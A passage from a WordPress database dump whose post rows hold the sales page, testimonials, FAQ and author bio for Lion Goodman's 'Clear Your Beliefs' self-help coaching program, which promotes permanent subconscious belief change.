their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 14:08:13', '2014-12-14 19:08:13', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2046, 2, '2014-12-14 14:10:52', '2014-12-14 19:10:52', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It’s that simple.</strong></p>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n<p>\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n</p>\n<em>\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs 